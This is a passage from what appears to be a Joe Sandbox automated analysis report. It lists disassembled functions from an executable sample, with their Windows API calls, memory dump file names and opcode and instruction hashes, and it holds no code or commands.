                                                                                  • Opcode ID: bce83691af7258c6ddd181c5aab9493d68d409349c01a83e8819e5d424b10e1e
                                                                                  • Instruction ID: 74201188f66db5d1a599edbd68555f3d84551c747c99bc44ee8d7a9735597e5f
                                                                                  • Opcode Fuzzy Hash: bce83691af7258c6ddd181c5aab9493d68d409349c01a83e8819e5d424b10e1e
                                                                                  • Instruction Fuzzy Hash: 89814C75A04B018BE734CF29C880B97BBE5FB94314F14492EE9AAC7741DB78E844CB65
                                                                                  Function 004D4BBB Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1475 4d4bbb-4d4c6c GetVersion 1477 4d4c6e-4d4c7d GetProcessVersion 1475->1477 1478 4d4c80-4d4c82 call 4cb66c 1475->1478 1477->1478 1480 4d4c87-4d4cc7 call 4cb628 LoadCursorA * 2 1478->1480
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32(?,?,?,004D4BB6), ref: 004D4C32
                                                                                  • GetProcessVersion.KERNELBASE(00000000,?,?,?,004D4BB6), ref: 004D4C6F
                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 004D4C9D
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004D4CA8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CursorLoadVersion$Process
                                                                                  • String ID:
                                                                                  • API String ID: 2246821583-0
                                                                                  • Opcode ID: 63c28eec8e8f68918e95a50839dc4b8c2e4b9fc552f4e46ba2d9454cc6662674
                                                                                  • Instruction ID: 0828b1ddfbf284029e20d8154029da2954f13e7f890214ed178ed5048d1aef5d
                                                                                  • Opcode Fuzzy Hash: 63c28eec8e8f68918e95a50839dc4b8c2e4b9fc552f4e46ba2d9454cc6662674
                                                                                  • Instruction Fuzzy Hash: 3911BFB0A007608FD3249F3A988462ABBE5FF58705B010E3FE187C6B80D778E4008B44
                                                                                  Function 0047A400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0047A405
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                  • GetFileAttributesA.KERNELBASE(?,00510870,?,00510870,?,00000000,/T:,?,00000000,00510870,?,00000000,0000005C), ref: 0047A467
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFileH_prologIncrementInterlocked
                                                                                  • String ID: %s\%s_%d
                                                                                  • API String ID: 4080302251-3340698188
                                                                                  • Opcode ID: 780636cfc3a3b722f2f42d200dbea453ffee486d429f3995186475bfbe94a1dd
                                                                                  • Instruction ID: c150f966942ce0e8ecb694d8dd581d99532d78f4933b440b9fb8d1704348c63c
                                                                                  • Opcode Fuzzy Hash: 780636cfc3a3b722f2f42d200dbea453ffee486d429f3995186475bfbe94a1dd
                                                                                  • Instruction Fuzzy Hash: 0D316C79800249EACB01EFA5C845EEEBB78EF14308F10845EF515A3282D778AB55CB66
                                                                                  Function 0049A650 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000001C,?,0049A7E5,00000000,00008CFC,?,?,?,?,?,0049F866,?,?,0049AF7F,00000000), ref: 0049A661
                                                                                  • GetDriveTypeA.KERNELBASE(?,?,0049A7E5,00000000,00008CFC,?,?,?,?,?,0049F866,?,?,0049AF7F,00000000), ref: 0049A6A0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: DriveTypeValue
                                                                                  • String ID: A:\
                                                                                  • API String ID: 4123041233-3379428675
                                                                                  • Opcode ID: 98669766a64af68c1017ad1ce35bfc56174c81fa0343478754a8b8bed0220472
                                                                                  • Instruction ID: ff9414dc1de9fad6441958b88db420c16f59f985488556b3d634b407f040d334
                                                                                  • Opcode Fuzzy Hash: 98669766a64af68c1017ad1ce35bfc56174c81fa0343478754a8b8bed0220472
                                                                                  • Instruction Fuzzy Hash: FCF0903020524057DF148F29A89461B3BD4AFC1740F08882EF486C7212D738CC20979A
                                                                                  Function 0047E64A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(UxTheme.dll,?,0041630F), ref: 0047E65C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: UxTheme.dll$iG
                                                                                  • API String ID: 1029625771-2390437190
                                                                                  • Opcode ID: 007ed99aa92d02597c228468bdced958fbf4f14d0bd85449b7cb75b4b2a39f76
                                                                                  • Instruction ID: 523670dd9f28c27e7305f091f5931e780cea9bba07eaec001bacc1966420c2ae
                                                                                  • Opcode Fuzzy Hash: 007ed99aa92d02597c228468bdced958fbf4f14d0bd85449b7cb75b4b2a39f76
                                                                                  • Instruction Fuzzy Hash: CAC08CB1A023609FD3605F08E809793BAE0EF08B22F02846EE09AC3200E3F45C808BC0
                                                                                  Function 004B1FCA Relevance: 4.6, APIs: 3, Instructions: 75timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(00000000), ref: 004B1FD7
                                                                                  • GetSystemTime.KERNEL32(?), ref: 004B1FE1
                                                                                  • GetTimeZoneInformation.KERNELBASE(?), ref: 004B2036
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$InformationLocalSystemZone
                                                                                  • String ID:
                                                                                  • API String ID: 2475273158-0
                                                                                  • Opcode ID: 3e2a79ae69ddfe7ada1d8b8ae77205117ab81feeb39ce546304fb2acab6e51cf
                                                                                  • Instruction ID: 882b0712ff75beb724ccb766c74c26bc787052be0c9ffaf838913f20df494ec8
                                                                                  • Opcode Fuzzy Hash: 3e2a79ae69ddfe7ada1d8b8ae77205117ab81feeb39ce546304fb2acab6e51cf
                                                                                  • Instruction Fuzzy Hash: 5A217C6980011AA9CF21BB98E9485FF73B9EF16714F440542FE10A6195E3B99CCBD738
                                                                                  Function 0049AD00 Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000001C,759183C0,0049F725), ref: 0049AD07
                                                                                  • CreateFileA.KERNELBASE(00008CFC,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 0049AD50
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 0049AD73
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFileHandleValue
                                                                                  • String ID:
                                                                                  • API String ID: 4140045754-0
                                                                                  • Opcode ID: ce5626d54503a7b3f5bf4b459af73d3458ef7a8503d937d6539d1571e353c893
                                                                                  • Instruction ID: f6f4e112e4ce2bb73bfbcb23924a9de1f7d412b1aac662afb54e41e4c53ccf41
                                                                                  • Opcode Fuzzy Hash: ce5626d54503a7b3f5bf4b459af73d3458ef7a8503d937d6539d1571e353c893
                                                                                  • Instruction Fuzzy Hash: 7001C071A047105FE7709B78FC84B97B7E9EB91724F000629F6969B292EB34B8028794
                                                                                  Function 0049ABE0 Relevance: 4.6, APIs: 3, Instructions: 51fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000001C,00000AF6,00000000,7591E800,?,0049F2F9,?), ref: 0049ABEA
                                                                                  • ReadFile.KERNELBASE(?,00008F5C,?,?,00000000), ref: 0049AC13
                                                                                  • OemToCharA.USER32(00008F5C,00008F5C), ref: 0049AC5F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharFileReadValue
                                                                                  • String ID:
                                                                                  • API String ID: 3634997981-0
                                                                                  • Opcode ID: 0081f0f8bba094984e3009cd0cdc4d87ac9d6e9b8673cd58c5d94f3df262ad0b
                                                                                  • Instruction ID: 1d5b2681e5679cb6685b946451578220220abf3c1ab67282c19e321293ac1009
                                                                                  • Opcode Fuzzy Hash: 0081f0f8bba094984e3009cd0cdc4d87ac9d6e9b8673cd58c5d94f3df262ad0b
                                                                                  • Instruction Fuzzy Hash: B70145212043867BDA248B25DD0CF93BF98EF56385F14413DF9489A242DB78A420C7FA
                                                                                  Function 004A24E0 Relevance: 3.3, APIs: 2, Instructions: 275COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c316a9602e4623095da9dfd54cf9e0d6acf79ee30604b10317fdb1c0597f63a6
                                                                                  • Instruction ID: bf76858b1990c32746246190158fa3ec8d5d5e743f5932e50630ea11d1a7f067
                                                                                  • Opcode Fuzzy Hash: c316a9602e4623095da9dfd54cf9e0d6acf79ee30604b10317fdb1c0597f63a6
                                                                                  • Instruction Fuzzy Hash: 8CA1B0756057018FE320CF28D980BA7B3E5FFA5304F14492EE89AC7341EB78E8059B29
                                                                                  Function 0049F810 Relevance: 3.2, APIs: 2, Instructions: 195COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000001C,00000000,00000000,00000000,?,0049AF7F,00000000), ref: 0049F81A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  • Opcode ID: 2b8b88667d06c803f98b7dc261c484fcb306df7f6fa4f83481945ea21d8f7932
                                                                                  • Instruction ID: 1aeaa06c8df3684af671a8d8fda7723af0044c40e3557516b71e1c92725c94d8
                                                                                  • Opcode Fuzzy Hash: 2b8b88667d06c803f98b7dc261c484fcb306df7f6fa4f83481945ea21d8f7932
                                                                                  • Instruction Fuzzy Hash: CE5186B16057015AEB30AF799880B97F7E4FF98324F204B3FE46EC2681EB3458488759
                                                                                  Function 004A1B40 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsDBCSLeadByte.KERNEL32(?,00000520,00000000,00000318,00000000,0049DC32,00000318,?), ref: 004A1B77
                                                                                  • CharNextA.USER32(0049DC32,00000520,00000000,00000318,00000000,0049DC32,00000318,?), ref: 004A1B85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharLeadNext
                                                                                  • String ID:
                                                                                  • API String ID: 355553264-0
                                                                                  • Opcode ID: 0b585c19c1f17b3c79c4eede2cf6a4295fe31d7208090836c4f875d0e2a1137e
                                                                                  • Instruction ID: 7d0b4f533633722eeaa6b2e6c3a9dd2063a8f8406fbcfbad09d5a4e03fbfca2a
                                                                                  • Opcode Fuzzy Hash: 0b585c19c1f17b3c79c4eede2cf6a4295fe31d7208090836c4f875d0e2a1137e
                                                                                  • Instruction Fuzzy Hash: 2401D1265083D15ED7314E2868803A7FB98DFA3760F1949AAD8D047312E329AC838378
                                                                                  Function 004A2ED0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(?,00000003,?,00000003,?,00000000,00000000,?,0049AAF3,?,?,?,00000000), ref: 004A2EFB
                                                                                  • GetLastError.KERNEL32(?,0049AAF3,?,?,?,00000000), ref: 004A2F08
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastPointer
                                                                                  • String ID:
                                                                                  • API String ID: 2976181284-0
                                                                                  • Opcode ID: 011817d680a07016599c923c392f012f9f1d92304430de7705fdf715e6d14444
                                                                                  • Instruction ID: da774e8cb40b7fe18e89592d26cfb6ca631a2fe726475d28e1a5b4cdcc89719c
                                                                                  • Opcode Fuzzy Hash: 011817d680a07016599c923c392f012f9f1d92304430de7705fdf715e6d14444
                                                                                  • Instruction Fuzzy Hash: D2F081B63092006FE2049A68EC859ABB3E9EBD5775F20473EFA62C32D0D670DC055665
                                                                                  Function 004D49CF Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00000000,00000000,004CBEC9,00000000,00000000,00000000,00000000,?,00000000,?,004C2313,00000000,00000000,00000000,00000000,004B2186), ref: 004D49D8
                                                                                  • SetErrorMode.KERNELBASE(00000000,?,00000000,?,004C2313,00000000,00000000,00000000,00000000,004B2186,00000000), ref: 004D49DF
                                                                                    • Part of subcall function 004D4A32: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 004D4A63
                                                                                    • Part of subcall function 004D4A32: lstrcpy.KERNEL32(?,.HLP), ref: 004D4B04
                                                                                    • Part of subcall function 004D4A32: lstrcat.KERNEL32(?,.INI), ref: 004D4B31
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3389432936-0
                                                                                  • Opcode ID: c9567e00202a23653ca7e555a588791f8f0db10986032ccc8e5d3993d9d71554
                                                                                  • Instruction ID: 5f34fff93e48106a80729249c7f530408dda51ae4c301dc0d1a33f189421b435
                                                                                  • Opcode Fuzzy Hash: c9567e00202a23653ca7e555a588791f8f0db10986032ccc8e5d3993d9d71554
                                                                                  • Instruction Fuzzy Hash: CCF08CB49046104FCB00EF20D4A4F093BE4AF44710F01845FF4448B362CB78D841CB5A
                                                                                  Function 004B6F3A Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,004B2104,00000001), ref: 004B6F4B
                                                                                    • Part of subcall function 004B6DF2: GetVersionExA.KERNEL32 ref: 004B6E11
                                                                                  • HeapDestroy.KERNEL32 ref: 004B6F8A
                                                                                    • Part of subcall function 004B6F97: RtlAllocateHeap.NTDLL(00000000,00000140,004B6F73), ref: 004B6FA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateCreateDestroyVersion
                                                                                  • String ID:
                                                                                  • API String ID: 760317429-0
                                                                                  • Opcode ID: 5f85c7bd0e2b06d2dcd447206a911433d14e56062852781c3ed8f1b87946df93
                                                                                  • Instruction ID: b8a29b2b52fc4ddf012faa311b5a1862a9b0048150e2d7c54d17f65751942478
